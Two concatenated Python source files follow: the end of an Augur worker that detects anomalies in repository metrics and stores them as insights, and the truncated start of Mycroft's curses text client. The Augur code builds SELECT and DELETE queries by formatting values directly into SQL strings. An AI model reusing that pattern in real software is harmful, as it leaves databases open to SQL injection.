of the queue if it is not already being processed Gets run whenever a new task is added """ logging.info("Running...\n") self._child = Process(target=self.collect, args=()) self._child.start() def collect(self): """ Function to process each entry in the worker's task queue Determines what action to take based off the message type """ while True: time.sleep(2) if not self._queue.empty(): message = self._queue.get() # else: # break self.discover_insights(message) def discover_insights(self, entry_info): """ Data collection function Query the github api for contributors and issues (not yet implemented) """ # Update table of endpoints before we query them all logging.info("Discovering insights for task with entry info: {}".format(entry_info)) self.record_model_process(entry_info, 'insights') # Set the endpoints we want to discover insights for endpoints = [{'cm_info': "issues-new"}, {'cm_info': "code-changes"}, {'cm_info': "code-changes-lines"}, {'cm_info': 'reviews'}] """""" """ For when we want all endpoints """ # """ Query all endpoints """ # endpointSQL = s.sql.text(""" # SELECT * FROM chaoss_metric_status WHERE cm_source = 'augur_db' # """) # for endpoint in pd.read_sql(endpointSQL, self.db, params={}).to_records(): # endpoints.append(endpoint) """""" # If we are discovering insights for a group vs repo, the base url will change if 'repo_group_id' in entry_info and 'repo_id' not in entry_info: base_url = 'http://{}:{}/api/unstable/repo-groups/{}/'.format( self.config['broker_host'],self.config['broker_port'], entry_info['repo_group_id']) else: base_url = 'http://{}:{}/api/unstable/repo-groups/9999/repos/{}/'.format( self.config['broker_host'],self.config['broker_port'], entry_info['repo_id']) # Hit and discover insights for every endpoint we care about for endpoint in endpoints: # Hit endpoint url = base_url + endpoint['cm_info'] logging.info("Hitting endpoint: " + url + "\n") r = requests.get(url=url) data = r.json() def is_unique_key(key): """ Helper method used to find which keys we want to analyze in each data point """ return 'date' not in key and key != 'repo_group_id' and key != 'repo_id' and key != 'repo_name' and key != 'rg_name' # Filter out keys that we do not want to analyze (e.g. repo_id) raw_values = {} unique_keys = None if len(data) > 0: try: unique_keys = list(filter(is_unique_key, data[0].keys())) except Exception as e: logging.info("Length bigger than 0 but cannot get 0th element? : {}, {}".format(data, e)) else: logging.info("Endpoint with url: {} returned an empty response. Moving on to next endpoint.\n".format(url)) continue # ci after past year insights after 90 days # num issues, issue comments, num commits, num pr, comments pr logging.info("Found the following unique keys for this endpoint: {}".format(unique_keys)) date_filtered_data = [] i = 0 not_timeseries = False for dict in data: begin_date = datetime.datetime.now() # Subtract 1 year and leap year check try: begin_date = begin_date.replace(year=begin_date.year-1) except ValueError: begin_date = begin_date.replace(year=begin_date.year-1, day=begin_date.day-1) begin_date = begin_date.strftime('%Y-%m-%d') try: if dict['date'] > begin_date: date_filtered_data = data[i:] logging.info("data 365 days ago date found: {}, {}".format(dict['date'], begin_date)) break except: logging.info("Endpoint {} is not a timeseries, moving to next".format(endpoint)) not_timeseries = True break i += 1 if not_timeseries: continue date_found_index = None date_found = False x = 0 begin_date = datetime.datetime.now() - datetime.timedelta(days=90) for dict in date_filtered_data: dict_date = datetime.datetime.strptime(dict['date'], '%Y-%m-%dT%H:%M:%S.%fZ')#2018-08-20T00:00:00.000Z if dict_date > begin_date and not date_found: date_found = True date_found_index = x logging.info("raw values 90 days ago date found: {}, {}".format(dict['date'], begin_date)) x += 1 for key in unique_keys: try: trash = int(dict[key]) * 2 + 1 raw_values[key].append(int(dict[key])) except: try: trash = int(dict[key]) * 2 + 1 raw_values[key] = [int(dict[key])] except: logging.info("Key: {} is non-numerical, moving to next key.".format(key)) for key in raw_values.keys(): if len(raw_values[key]) > 0: confidence = 0.95 mean, lower, upper = self.confidence_interval(raw_values[key], confidence=confidence) logging.info("Upper: {}, middle: {}, lower: {}".format(upper, mean, lower)) i = 0 discovery_index = None insight = False max_difference = 0 score = 0 date_filtered_raw_values = [] date_filtered_raw_values = date_filtered_data[date_found_index:] logging.info("Raw values: {}".format(date_filtered_raw_values)) for dict in date_filtered_raw_values: if (dict[key] > upper and dict[key] - upper > max_difference) or (dict[key] < lower and lower - dict[key] > max_difference): logging.info("Band breached at {}. Marking discovery. dict: {}, key: {}, mean: {}".format(i, dict, key, mean)) max_difference = max(dict[key] - upper,lower - dict[key]) score = abs(dict[key] - mean) / mean * 100 insight = True discovery_index = i i += 1 if insight and 'date' in data[0]: ### INSIGHT DISCOVERED ### # Check if new insight has a better score than other insights in its place, use result # to determine if we continue in the insertion process (0 for no insertion, 1 for record # insertion, 2 for record and insight data points insertion) instructions = self.clear_insight(entry_info['repo_id'], score, endpoint['cm_info'], key) # self.clear_insight(entry_info['repo_id'], score, endpoint['cm_info'] + ' ({})'.format(key)) # Use result from clearing function to determine if we need to insert the record if instructions['record']: # Insert record in records table and send record to slack bot record = { 'repo_id': int(entry_info['repo_id']), 'ri_metric': endpoint['cm_info'], 'ri_field': key, 'ri_value': date_filtered_raw_values[discovery_index][key],#date_filtered_raw_values[j][key], 'ri_date': date_filtered_raw_values[discovery_index]['date'],#date_filtered_raw_values[j]['date'], 'ri_score': score, 'ri_detection_method': '95% confidence interval', "tool_source": self.tool_source, "tool_version": self.tool_version, "data_source": self.data_source } result = self.db.execute(self.repo_insights_records_table.insert().values(record)) logging.info("Primary key inserted into the repo_insights_records table: {}".format(result.inserted_primary_key)) self.insight_results_counter += 1 # Send insight to Jonah for slack bot self.send_insight(record, abs(date_filtered_raw_values[discovery_index][key] - mean)) # Use result from clearing function to determine if we still need to insert the insight if instructions['insight']: j = 0 logging.info("Starting j: {}, discovery_index: {}, data: {}".format(j, discovery_index, date_filtered_data[j])) for tuple in date_filtered_raw_values: try: data_point = { 'repo_id': int(entry_info['repo_id']), 'ri_metric': endpoint['cm_info'], 'ri_field': key, 'ri_value': tuple[key],#date_filtered_raw_values[j][key], 'ri_date': tuple['date'],#date_filtered_raw_values[j]['date'], 'ri_fresh': 0 if j < discovery_index else 1, 'ri_score': score, 'ri_detection_method': '95% confidence interval', "tool_source": self.tool_source, "tool_version": self.tool_version, "data_source": self.data_source } result = self.db.execute(self.repo_insights_table.insert().values(data_point)) logging.info("Primary key inserted into the repo_insights table: " + str(result.inserted_primary_key)) logging.info("Inserted data point for endpoint: {}\n".format(endpoint['cm_info'])) j += 1 logging.info("incremented j: {}, discovery_index: {}, data: {}".format(j, discovery_index, date_filtered_data[j])) except Exception as e: logging.info("error occurred while storing datapoint: {}".format(repr(e))) break else: logging.info("Key: {} has empty raw_values, should not have key here".format(key)) self.register_task_completion(entry_info, "insights") def record_model_process(self, entry_info, model): task_history = { "repo_id": entry_info['repo_id'], "worker": self.config['id'], "job_model": model, "oauth_id": self.config['zombie_id'], "timestamp": datetime.datetime.now(), "status": "Stopped", "total_results": self.insight_results_counter } if self.finishing_task: result = self.helper_db.execute(self.history_table.update().where( self.history_table.c.history_id==self.history_id).values(task_history)) else: result = self.helper_db.execute(self.history_table.insert().values(task_history)) logging.info("Record incomplete history tuple: {}".format(result.inserted_primary_key)) self.history_id = int(result.inserted_primary_key[0]) def register_task_completion(self, entry_info, model): # Task to send back to broker task_completed = { 'worker_id': self.config['id'], 'job_type': entry_info['job_type'], 'repo_id': entry_info['repo_id'], 'git_url': entry_info['git_url'] } # Add to history table task_history = { "repo_id": entry_info['repo_id'], "worker": self.config['id'], "job_model": model, "oauth_id": self.config['zombie_id'], "timestamp": datetime.datetime.now(), "status": "Success", "total_results": self.insight_results_counter } self.helper_db.execute(self.history_table.update().where( self.history_table.c.history_id==self.history_id).values(task_history)) logging.info("Recorded job completion for: " + str(task_completed) + "\n") # Update job process table updated_job = { "since_id_str": entry_info['repo_id'], "last_count": self.insight_results_counter, "last_run": datetime.datetime.now(), "analysis_state": 0 } self.helper_db.execute(self.job_table.update().where( self.job_table.c.job_model==model).values(updated_job)) logging.info("Update job process for model: " + model + "\n") # Notify broker of completion logging.info("Telling broker we completed task: " + str(task_completed) + "\n\n" + "This task inserted: " + str(self.insight_results_counter) + " tuples.\n\n") requests.post('http://{}:{}/api/unstable/completed_task'.format( self.config['broker_host'],self.config['broker_port']), json=task_completed) # Reset results counter for next task self.insight_results_counter = 0 def send_insight(self, insight, units_from_mean): try: begin_date = datetime.datetime.now() - datetime.timedelta(days=30) dict_date = datetime.datetime.strptime(insight['ri_date'], '%Y-%m-%dT%H:%M:%S.%fZ')#2018-08-20T00:00:00.000Z logging.info("about to send to jonah") if dict_date > begin_date and self.send_insights: logging.info("Insight less than 7 days ago date found: {}\n\nSending to Jonah...".format(insight)) to_send = { 'insight': True, 'rg_name': insight['rg_name'], 'repo_git': insight['repo_git'], 'value': insight['ri_value'], 'field': insight['ri_field'], 'metric': insight['ri_metric'], 'units_from_mean': units_from_mean, 'detection_method': insight['ri_detection_method'] } requests.post('https://fgrmv7bswc.execute-api.us-east-2.amazonaws.com/dev/insight-event', json=to_send) except Exception as e: logging.info("sending insight to jonah failed: {}".format(e)) def clear_insight(self, repo_id, new_score, new_metric, new_field): logging.info("Checking if insight slots filled...") # Dict that will be returned that instructs the rest of the worker where the insight insertion is # needed (determined by if this new insights score is higher than already stored ones) insertion_directions = {'record': False, 'insight': False} # Query current record for this recordSQL = s.sql.text(""" SELECT ri_metric, repo_id, ri_score, ri_field FROM repo_insights_records WHERE repo_id = {} AND ri_metric = '{}' AND ri_field = '{}' ORDER BY ri_score DESC """.format(repo_id, new_metric, new_field)) rec = json.loads(pd.read_sql(recordSQL, self.db, params={}).to_json(orient='records')) logging.info("recordsql: {}, \n{}".format(recordSQL, rec)) # If new score is higher, continue with deletion if len(rec) > 0: if new_score > rec[0]['ri_score'] or self.refresh: insertion_directions['record'] = True for record in rec: logging.info("Refresh is on or Insight record found with a greater score than current slot filled for " "repo {} metric {} new score {}, old score {}".format(repo_id, record['ri_metric'], new_score, record['ri_score'])) deleteSQL = """ DELETE FROM repo_insights_records I WHERE repo_id = {} AND ri_metric = '{}' AND ri_field = '{}' """.format(record['repo_id'], record['ri_metric'], record['ri_field']) try: result = self.db.execute(deleteSQL) except Exception as e: logging.info("Error occured deleting insight slot: {}".format(e)) else: insertion_directions['record'] = True # Query current insights and rank by score num_insights_per_repo = 2 insightSQL = s.sql.text(""" SELECT distinct(ri_metric),repo_id, ri_score FROM repo_insights WHERE repo_id = {} ORDER BY ri_score ASC """.format(repo_id)) ins = json.loads(pd.read_sql(insightSQL, self.db, params={}).to_json(orient='records')) logging.info("This repos insights: {}".format(ins)) # Determine if inisghts need to be deleted based on if there are more insights than we want stored, # or if the current insights have a lower score num_insights = len(ins) to_delete = [] for insight in ins: insight['ri_score'] = insight['ri_score'] if insight['ri_score'] else 0.0 logging.info("{}, {}, {}, {}".format(insight['ri_metric'], new_metric, insight['ri_score'], num_insights_per_repo)) if (insight['ri_score'] < new_score and num_insights >= num_insights_per_repo) or num_insights > num_insights_per_repo or (insight['ri_metric'] == new_metric and self.refresh): num_insights -= 1 to_delete.append(insight) logging.info("condition met, new len: {}, insight score: {}, new_score: {}".format(num_insights, insight['ri_score'], new_score)) # After psuedo-deletion, determine if insertion of the new insight is needed if num_insights < num_insights_per_repo: insertion_directions['insight'] = True # Delete all insights marked for deletion for insight in to_delete: logging.info("insight found with a greater score than current slots filled for repo {} new score {}, old score {}".format(repo_id, new_score, insight['ri_score'])) deleteSQL = """ DELETE FROM repo_insights I WHERE repo_id = {} AND ri_metric = '{}' """.format(insight['repo_id'], insight['ri_metric']) try: result = self.db.execute(deleteSQL) except Exception as e: logging.info("Error occured deleting insight slot: {}".format(e)) return insertion_directions def confidence_interval(self, data, timeperiod='week', confidence=.95): """ Method to find high activity issues in the past specified timeperiod """ a = 1.0 * np.array(data) logging.info("np array: {}".format(a)) n = len(a) m, se = np.mean(a), scipy.stats.sem(a) logging.info("Mean: {}, standard error: {}".format(m, se)) h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1) logging.info("H: {}".format(h)) return m, m-h, m+h def update_metrics(self): logging.info("Preparing to update metrics ...\n\n" + "Hitting endpoint: http://{}:{}/api/unstable/metrics/status ...\n".format( self.config['broker_host'],self.config['broker_port'])) r = requests.get(url='http://{}:{}/api/unstable/metrics/status'.format( self.config['broker_host'],self.config['broker_port'])) data = r.json() active_metrics = [metric for metric in data if metric['backend_status'] == 'implemented'] # Duplicate checking ... need_insertion = self.filter_duplicates({'cm_api_endpoint_repo': "endpoint"}, ['chaoss_metric_status'], active_metrics) logging.info("Count of contributors needing insertion: " + str(len(need_insertion)) + "\n") for metric in need_insertion: tuple = { "cm_group": metric['group'], "cm_source": metric['data_source'], "cm_type": metric['metric_type'], "cm_backend_status": metric['backend_status'], "cm_frontend_status": metric['frontend_status'], "cm_defined": True if metric['is_defined'] == 'true' else False, "cm_api_endpoint_repo": metric['endpoint'], "cm_api_endpoint_rg": None, "cm_info": metric['display_name'], "cm_working_group": metric['group'], "cm_info": metric['tag'], "tool_source": self.tool_source, "tool_version": self.tool_version, "data_source": metric['data_source'] } # Commit metric insertion to the chaoss metrics table result = self.db.execute(self.chaoss_metric_status_table.insert().values(tuple)) logging.info("Primary key inserted into the metrics table: " + str(result.inserted_primary_key)) self.metric_results_counter += 1 logging.info("Inserted metric: " + metric['display_name'] + "\n") def filter_duplicates(self, cols, tables, og_data): need_insertion = [] table_str = tables[0] del tables[0] for table in tables: table_str += ", " + table for col in cols.keys(): colSQL = s.sql.text(""" SELECT {} FROM {} """.format(col, table_str)) values = pd.read_sql(colSQL, self.db, params={}) for obj in og_data: if values.isin([obj[cols[col]]]).any().any(): logging.info("value of tuple exists: " + str(obj[cols[col]]) + "\n") elif obj not in need_insertion: need_insertion.append(obj) logging.info("While filtering duplicates, we reduced the data size from " + str(len(og_data)) + " to " + str(len(need_insertion)) + "\n") return need_insertion
text_client.py
# Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import sys import io import signal from math import ceil from .gui_server import start_qml_gui from mycroft.tts import TTS import os import os.path import time import curses import textwrap import json import mycroft.version from threading import Thread, Lock from mycroft.messagebus.client.ws import WebsocketClient from mycroft.messagebus.message import Message from mycroft.util.log import LOG from mycroft.configuration import Configuration import locale # Curses uses LC_ALL to determine how to display chars set it to system # default locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default preferred_encoding = locale.getpreferredencoding() bSimple = False bus = None # Mycroft messagebus connection config = {} # Will be populated by the Mycroft configuration event_thread = None history = [] chat = [] # chat history, oldest at the lowest index line = "" scr = None log_line_offset = 0 # num lines back in logs to show log_line_lr_scroll = 0 # amount to scroll left/right for long lines longest_visible_line = 0 # for HOME key auto_scroll = True # for debugging odd terminals last_key = "" show_last_key = False show_gui = None # None = not initialized, else True/False gui_text = [] log_lock = Lock() max_log_lines = 5000 mergedLog = [] filteredLog = [] default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon", "DEBUG"] log_filters = list(default_log_filters) log_files = [] find_str = None cy_chat_area = 7 # default chat history height (in lines) size_log_area = 0 # max number of visible log lines, calculated during draw # Values used to display the audio meter show_meter = True meter_peak = 20 meter_cur = -1 meter_thresh = -1 SCR_MAIN = 0 SCR_HELP = 1 SCR_SKILLS = 2 screen_mode = SCR_MAIN subscreen = 0 # for help pages, etc. FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw screen_lock = Lock() is_screen_dirty = True # Curses color codes (reassigned at runtime) CLR_HEADING = 0 CLR_FIND = 0 CLR_CHAT_RESP = 0 CLR_CHAT_QUERY = 0 CLR_CMDLINE = 0 CLR_INPUT = 0 CLR_LOG1 = 0 CLR_LOG2 = 0 CLR_LOG_DEBUG = 0 CLR_LOG_ERROR = 0 CLR_LOG_CMDMESSAGE = 0 CLR_METER_CUR = 0 CLR_METER = 0 # Allow Ctrl+C catching... ctrl_c_was_pressed = False def ctrl_c_handler(signum, frame): global ctrl_c_was_pressed ctrl_c_was_pressed = True def ctrl_c_pressed(): global ctrl_c_was_pressed if ctrl_c_was_pressed: ctrl_c_was_pressed = False return True else: return False signal.signal(signal.SIGINT, ctrl_c_handler) ############################################################################## # Helper functions def clamp(n, smallest, largest): """ Force n to be between smallest and largest, inclusive """ return max(smallest, min(n, largest)) def handleNonAscii(text): """ If default locale supports UTF-8 reencode the string otherwise remove the offending characters. """ if preferred_encoding == 'ASCII': return ''.join([i if ord(i) < 128 else ' ' for i in text]) else: return text.encode(preferred_encoding) ############################################################################## # Settings config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf") def load_mycroft_config(bus): """ Load the mycroft config and connect it to updates over the messagebus. """ Configuration.init(bus) return Configuration.get() def connect_to_mycroft(): """ Connect to the mycroft messagebus and load and register config on the bus. Sets the bus and config global variables """ global bus global config bus = connect_to_messagebus() config = load_mycroft_config(bus) def load_settings(): global log_filters global cy_chat_area global show_last_key global max_log_lines global show_meter try: with io.open(config_file, 'r') as f: config = json.load(f) if "filters" in config: log_filters = config["filters"] if "cy_chat_area" in config: cy_chat_area = config["cy_chat_area"] if "show_last_key" in config: show_last_key = config["show_last_key"] if "max_log_lines" in config: max_log_lines = config["max_log_lines"] if "show_meter" in config: show_meter = config["show_meter"] except Exception as e: LOG.info("Ignoring failed load of settings file") def save_settings(): config = {} config["filters"] = log_filters config["cy_chat_area"] = cy_chat_area config["show_last_key"] = show_last_key config["max_log_lines"] = max_log_lines config["show_meter"] = show_meter with io.open(config_file, 'w') as f: f.write(str(json.dumps(config, ensure_ascii=False))) ############################################################################## # Log file monitoring class LogMonitorThread(Thread): def __init__(self, filename, logid): global log_files Thread.__init__(self) self.filename = filename self.st_results = os.stat(filename) self.logid = str(logid) log_files.append(filename) def run(self): while True: try: st_results = os.stat(self.filename) # Check if file has been modified since last read if not st_results.st_mtime == self.st_results.st_mtime: self.read_file_from(self.st_results.st_size) self.st_results = st_results set_screen_dirty() except OSError: # ignore any file IO exceptions, just try again pass time.sleep(0.1) def read_file_from(self, bytefrom): global meter_cur global meter_thresh global filteredLog global mergedLog global log_line_offset global log_lock with io.open(self.filename) as fh: fh.seek(bytefrom) while True: line = fh.readline() if line == "": break # Allow user to filter log output ignore = False if find_str: if find_str not in line: ignore = True else: for filtered_text in log_filters: if filtered_text in line: ignore = True break with log_lock: if ignore: mergedLog.append(self.logid + line.rstrip()) else: if bSimple: print(line.rstrip()) else: filteredLog.append(self.logid + line.rstrip()) mergedLog.append(self.logid + line.rstrip()) if not auto_scroll: log_line_offset += 1 # Limit log to max_log_lines if len(mergedLog) >= max_log_lines: with log_lock: cToDel = len(mergedLog) - max_log_lines if len(filteredLog) == len(mergedLog): del filteredLog[:cToDel] del mergedLog[:cToDel] # release log_lock before calling to prevent deadlock if len(filteredLog) != len(mergedLog): rebuild_filtered_log() def start_log_monitor(filename): if os.path.isfile(filename): thread = LogMonitorThread(filename, len(log_files)) thread.setDaemon(True) # this thread won't prevent prog from exiting thread.start() class MicMonitorThread(Thread): def __init__(self, filename): Thread.__init__(self) self.filename = filename self.st_results = None def run(self): while True: try: st_results = os.stat(self.filename) if (not self.st_results or not st_results.st_ctime == self.st_results.st_ctime or not st_results.st_mtime == self.st_results.st_mtime): self.read_mic_level() self.st_results = st_results set_screen_dirty() except Exception: # Ignore whatever failure happened and just try again later pass time.sleep(0.2) def read_mic_level(self): global meter_cur global meter_thresh with io.open(self.filename, 'r') as fh: line = fh.readline() # Just adjust meter settings # Ex:Energy: cur=4 thresh=1.5 parts = line.split("=") meter_thresh = float(parts[-1]) meter_cur = float(parts[-2].split(" ")[0]) class ScreenDrawThread(Thread): def __init__(self): Thread.__init__(self) def run(self): global scr global screen_lock global is_screen_dirty global log_lock while scr: try: if is_screen_dirty: # Use a lock to prevent screen corruption when drawing # from multiple threads with screen_lock: is_screen_dirty = False if screen_mode == SCR_MAIN: with log_lock: do_draw_main(scr) elif screen_mode == SCR_HELP: do_draw_help(scr) finally: time.sleep(0.01) def start_mic_monitor(filename): if os.path.isfile(filename): thread = MicMonitorThread(filename) thread.setDaemon(True) # this thread won't prevent prog from exiting thread.start() def add_log_message(message): """ Show a message for the user (mixed in the logs) """ global filteredLog global mergedLog global log_line_offset global log_lock with log_lock: message = "@" + message # the first byte is a code filteredLog.append(message) mergedLog.append(message) if log_line_offset != 0: log_line_offset = 0 # scroll so the user can see the message set_screen_dirty() def clear_log(): global filteredLog global mergedLog global log_line_offset global log_lock with log_lock: mergedLog = [] filteredLog = [] log_line_offset = 0 def rebuild_filtered_log(): global filteredLog global mergedLog global log_lock with log_lock: filteredLog = [] for line in mergedLog: # Apply filters ignore = False if find_str and find_str != "": # Searching log if find_str not in line: ignore = True else: # Apply filters for filtered_text in log_filters: if filtered_text and filtered_text in line: ignore = True break if not ignore: filteredLog.append(line) ############################################################################## # Capturing output from Mycroft def handle_speak(event): global chat utterance = event.data.get('utterance') utterance = TTS.remove_ssml(utterance) if bSimple: print(">> " + utterance) else: chat.append(">> " + utterance) set_screen_dirty() def handle_utterance(event): global chat global history utterance = event.data.get('utterances')[0] history.append(utterance) chat.append(utterance) set_screen_dirty() def connect(bus): """ Run the mycroft messagebus referenced by bus. Arguments: bus: Mycroft messagebus instance """ bus.run_forever() ############################################################################## # Capturing the messagebus def handle_message(msg): # TODO: Think this thru a little bit -- remove this logging within core? # add_log_message(msg) pass ############################################################################## # "Graphic primitives" def draw(x, y, msg, pad=None, pad_chr=None, clr=None): """Draw a text to the screen Args: x (int): X coordinate (col), 0-based from upper-left y (int): Y coordinate (row), 0-based from upper-left msg (str): string to render to screen pad (bool or int, optional): if int, pads/clips to given length, if True use right edge of the screen. pad_chr (char, optional): pad character, default is space clr (int, optional): curses color, Defaults to CLR_LOG1. """ if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS: return if x + len(msg) > curses.COLS: s = msg[:curses.COLS-x] else: s = msg if pad: ch = pad_chr or " " if pad is True: pad = curses.COLS # pad to edge of screen s += ch * (pad-x-len(msg)) else: # pad to given length (or screen width) if x+pad > curses.COLS: pad = curses.COLS-x s += ch * (pad-len(msg)) if not clr: clr = CLR_LOG1 scr.addstr(y, x, s, clr) ############################################################################## # Screen handling def init_screen(): global CLR_HEADING global CLR_FIND global CLR_CHAT_RESP global CLR_CHAT_QUERY global CLR_CMDLINE global CLR_INPUT global CLR_LOG1 global CLR_LOG2 global CLR_LOG_DEBUG global CLR_LOG_ERROR global CLR_LOG_CMDMESSAGE global CLR_METER_CUR global CLR_METER if curses.has_colors(): curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK) bg = curses.COLOR_BLACK for i in range(1, curses.COLORS): curses.init_pair(i + 1, i, bg) # Colors (on black backgound): # 1 = white 5 = dk blue # 2 = dk red 6 = dk purple # 3 = dk green 7 = dk cyan # 4 = dk yellow 8 = lt gray CLR_HEADING = curses.color_pair(1) CLR_CHAT_RESP = curses.color_pair(4) CLR_CHAT_QUERY = curses.color_pair(7) CLR_FIND = curses.color_pair(4) CLR_CMDLINE = curses.color_pair(7) CLR_INPUT = curses.color_pair(7) CLR_LOG1 = curses.color_pair(3) CLR_LOG2 = curses.color_pair(6) CLR_LOG_DEBUG = curses.color_pair(4) CLR_LOG_ERROR = curses.color_pair(2) CLR_LOG_CMDMESSAGE = curses.color_pair(2) CLR_METER_CUR = curses.color_pair(2) CLR_METER = curses.color_pair(4) def scroll_log(up, num_lines=None): global log_line_offset # default to a half-page if not num_lines: num_lines = size_log_area // 2 with log_lock: if up: log_line_offset -= num_lines else: log_line_offset += num_lines if log_line_offset > len(filteredLog): log_line_offset = len(filteredLog) - 10 if log_line_offset < 0: log_line_offset = 0 set_screen_dirty() def _do_meter(height): if not show_meter or meter_cur == -1: return # The meter will look something like this: # # 8.4 * # * # -*- 2.4 # * # * # * # Where the left side is the current level and the right side is # the threshold level for 'silence'. global scr global meter_peak if meter_cur > meter_peak: meter_peak = meter_cur + 1 scale = meter_peak if meter_peak > meter_thresh * 3: scale = meter_thresh * 3 h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1) h_thresh = clamp( int((float(meter_thresh) / scale) * height), 0, height - 1) clr = curses.color_pair(4) # dark yellow str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4' str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24' meter_width = len(str_level) + len(str_thresh) + 4 for i in range(0, height): meter = "" if i == h_cur: # current energy level meter = str_level else: meter = " " * len(str_level) if i == h_thresh: # add threshold indicator meter += "--- " else: meter += " " if i == h_thresh: # 'silence' threshold energy level meter += str_thresh # draw the line meter += " " * (meter_width - len(meter)) scr.addstr(curses.LINES - 1 - i, curses.COLS - len(meter) - 1, meter, clr) # draw an asterisk if the audio energy is at this level if i <= h_cur: if meter_cur > meter_thresh: clr_bar = curses.color_pair(3) # dark green for loud else: clr_bar = curses.color_pair(5) # dark blue for 'silent' scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4, "*", clr_bar) def _do_gui(gui_width): clr = curses.color_pair(2) # dark red x = curses.COLS - gui_width y = 3 draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING) cnt = len(gui_text)+1 if cnt > curses.LINES-15: cnt = curses.LINES-15 for i in range(0, cnt): draw(x, y+1+i, " !", clr=CLR_HEADING) if i < len(gui_text): draw(x+2, y+1+i, gui_text[i], pad=gui_width-3) else: draw(x+2, y+1+i, "*"*(gui_width-3)) draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING) draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING) def set_screen_dirty(): global is_screen_dirty global screen_lock with screen_lock: is_screen_dirty = True def do_draw_main(scr): global log_line_offset global longest_visible_line global last_full_redraw global auto_scroll global size_log_area if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY: # Do a full-screen redraw periodically to clear and # noise from non-curses text that get output to the # screen (e.g. modules that do a 'print') scr.clear() last_full_redraw = time.time() else: scr.erase() # Display log output at the top cLogs = len(filteredLog) + 1 # +1 for the '--end--' size_log_area = curses.LINES - (cy_chat_area + 5) start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset end = cLogs - log_line_offset if start < 0: end -= start start = 0 if end > cLogs: end = cLogs auto_scroll = (end == cLogs) # adjust the line offset (prevents paging up too far) log_line_offset = cLogs - end # Top header and line counts if find_str: scr.addstr(0, 0, "Search Results: ", CLR_HEADING) scr.addstr(0, 16, find_str, CLR_FIND) scr.addstr(0, 16 + len(find_str), " ctrl+X to end" + " " * (curses.COLS - 31 - 12 - len(find_str)) + str(start) + "-" + str(end) + " of " + str(cLogs), CLR_HEADING) else: scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) + str(start) + "-" + str(end) + " of " + str(cLogs), CLR_HEADING) ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ===" scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING) scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING) y = 2 len_line = 0 for i in range(start, end): if i >= cLogs - 1: log = ' ^--- NEWEST ---^ ' else: log = filteredLog[i] logid = log[0] if len(log) > 25 and log[5] == '-' and log[8] == '-': log = log[27:] # skip logid & date/time at the front of log line else: log = log[1:] # just skip the logid # Categorize log line if " - DEBUG - " in log: log = log.replace("Skills ", "") clr = CLR_LOG_DEBUG elif " - ERROR - " in log: clr = CLR_LOG_ERROR else: if logid == "1": clr = CLR_LOG1 elif logid == "@": clr = CLR_LOG_CMDMESSAGE else: clr = CLR_LOG2 # limit output line to screen width len_line = len(log) if len(log) > curses.COLS: start = len_line - (curses.COLS - 4) - log_line_lr_scroll if start < 0: start = 0 end = start + (curses.COLS - 4) if start == 0: log = log[start:end] + "~~~~" # start.... elif end >= len_line - 1: log = "~~~~" + log[start:end] # ....end else: log = "~~" + log[start:end] + "~~" # ..middle.. if len_line > longest_visible_line: longest_visible_line = len_line scr.addstr(y, 0, handleNonAscii(log), clr) y += 1 # Log legend in the lower-right y_log_legend = curses.LINES - (3 + cy_chat_area) scr.addstr(y_log_legend, curses.COLS // 2 + 2, make_titlebar("Log Output Legend", curses.COLS // 2 - 2), CLR_HEADING) scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2, "DEBUG output", CLR_LOG_DEBUG) if len(log_files) > 0: scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2, os.path.basename(log_files[0]) + ", other", CLR_LOG1) if len(log_files) > 1: scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2, os.path.basename(log_files[1]), CLR_LOG2) # Meter y_meter = y_log_legend if show_meter: scr.addstr(y_meter, curses.COLS - 14, " Mic Level ", CLR_HEADING) # History log in the middle y_chat_history = curses.LINES - (3 + cy_chat_area) chat_width = curses.COLS // 2 - 2 chat_out = [] scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width), CLR_HEADING) # Build a nicely wrapped version of the chat log idx_chat = len(chat) - 1 while len(chat_out) < cy_chat_area and idx_chat >= 0: if chat[idx_chat][0] == '>': wrapper = textwrap.TextWrapper(initial_indent="", subsequent_indent=" ", width=chat_width) else: wrapper = textwrap.TextWrapper(width=chat_width) chatlines = wrapper.wrap(chat[idx_chat]) for txt in reversed(chatlines): if len(chat_out) >= cy_chat_area: break chat_out.insert(0, txt) idx_chat -= 1 # Output the chat y = curses.LINES - (2 + cy_chat_area) for txt in chat_out: if txt.startswith(">> ") or txt.startswith(" "): clr = CLR_CHAT_RESP else: clr = CLR_CHAT_QUERY scr.addstr(y, 1, handleNonAscii(txt), clr) y += 1 if show_gui and curses.COLS > 20 and curses.LINES > 20: _do_gui(curses.COLS-20) # Command line at the bottom ln = line if len(line) > 0 and line[0] == ":": scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):", 